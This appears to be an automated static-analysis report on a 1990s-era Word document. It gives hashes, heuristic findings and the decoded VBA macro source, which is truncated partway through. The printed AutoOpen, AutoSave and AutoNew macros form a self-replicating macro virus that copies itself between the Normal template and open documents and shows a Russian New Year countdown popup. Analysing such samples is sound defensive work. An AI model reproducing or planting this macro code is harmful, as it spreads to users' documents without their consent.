Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9e5d4adc8925859f…

MALICIOUS

Office (OLE)

Size: 32.0 KB
Created: 1997-01-29 21:33:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 03815399f7aaf5d96c36102bf43fa681
SHA-1: 0fa2b8f96a08ed042bcc7d720244f5d7574fff64
SHA-256: 9e5d4adc8925859f925e291b5299b16f461f6cb6f385f0f6b3081ab04a2ecb90
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a legacy Word document containing VBA macros. The AutoOpen macro, detected by heuristics, is designed to copy the 'NewMacros1' module to both the Normal template and the active document. This suggests an attempt to establish persistence or facilitate further malicious actions. The script's logic for copying macros indicates a potential for self-propagation within the user's Office environment.

Heuristics 3

  • VBA macros detected (severity: medium; 1 related finding; OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4882 bytes
SHA-256: d3e27d42e292dc728d0ace988e1fdbb53f652ee262ec4a3fff6117cc09c03421
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros1"
Sub AutoNew()

Dim bFindInTempl, bFindInDoc As Boolean
bFindInTempl = False
bFindInDoc = False

'Search in the active document
For Each xItem In ActiveDocument.VBProject.VBComponents
If xItem.Name = "NewMacros1" _
Then bFindInDoc = True
Next xItem

'Search in the base template
For Each xItem In NormalTemplate.VBProject.VBComponents
If xItem.Name = "NewMacros1" _
Then bFindInTempl = True
Next xItem

If bFindInTempl = True And bFindInFile = True Then
Application.OrganizerDelete Source:= _
        NormalTemplate.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
bFindInTempl = False
End If

'Found in the template
If bFindInTempl = True And bFindInDoc = False Then
    Application.OrganizerCopy Source:= _
        NormalTemplate.FullName, _
        Destination:=ActiveDocument.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
End If

'... in the document
If bFindInDoc = True And bFindInTempl = False Then
   Application.OrganizerCopy Source:= _
        ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
End If

If Month(Now()) = 12 Then
Dim seconds As String
seconds = (31 - Day(Now())) * 24 * 60 * 60
Dim message As String
message = "До нового года осталось: " + seconds + " секунд!"
r = MsgBox(message, vbInformation, "Готовся!!!")
End If

End Sub

Sub AutoSave()

Dim bFindInTempl, bFindInDoc As Boolean
bFindInTempl = False
bFindInDoc = False

'Search in the active document
For Each xItem In ActiveDocument.VBProject.VBComponents
If xItem.Name = "NewMacros1" _
Then bFindInDoc = True
Next xItem

'Search in the base template
For Each xItem In NormalTemplate.VBProject.VBComponents
If xItem.Name = "NewMacros1" _
Then bFindInTempl = True
Next xItem

If bFindInTempl = True And bFindInFile = True Then
Application.OrganizerDelete Source:= _
        NormalTemplate.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
bFindInTempl = False
End If

'Found in the template
If bFindInTempl = True And bFindInDoc = False Then
    Application.OrganizerCopy Source:= _
        NormalTemplate.FullName, _
        Destination:=ActiveDocument.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
End If

'... in the document
If bFindInDoc = True And bFindInTempl = False Then
   Application.OrganizerCopy Source:= _
        ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
End If

If Month(Now()) = 12 Then
Dim seconds As String
seconds = (31 - Day(Now())) * 24 * 60 * 60
Dim message As String
message = "До нового года осталось: " + seconds + " секунд!"
r = MsgBox(message, vbInformation, "Готовся!!!")
End If

End Sub

Sub AutoOpen()

Dim bFindInTempl, bFindInDoc As Boolean
bFindInTempl = False
bFindInDoc = False

'Search in the active document
For Each xItem In ActiveDocument.VBProject.VBComponents
If xItem.Name = "NewMacros1" _
Then bFindInDoc = True
Next xItem

'Search in the base template
For Each xItem In NormalTemplate.VBProject.VBComponents
If xItem.Name = "NewMacros1" _
Then bFindInTempl = True
Next xItem

If bFindInTempl = True And bFindInDoc = True Then
Application.OrganizerDelete Source:= _
        NormalTemplate.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
bFindInTempl = False
End If

'Found in the template
If bFindInTempl = True And bFindInDoc = False Then
    Application.OrganizerCopy Source:= _
        NormalTemplate.FullName, _
        Destination:=ActiveDocument.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
End If

'... in the document
If bFindInDoc
... (truncated)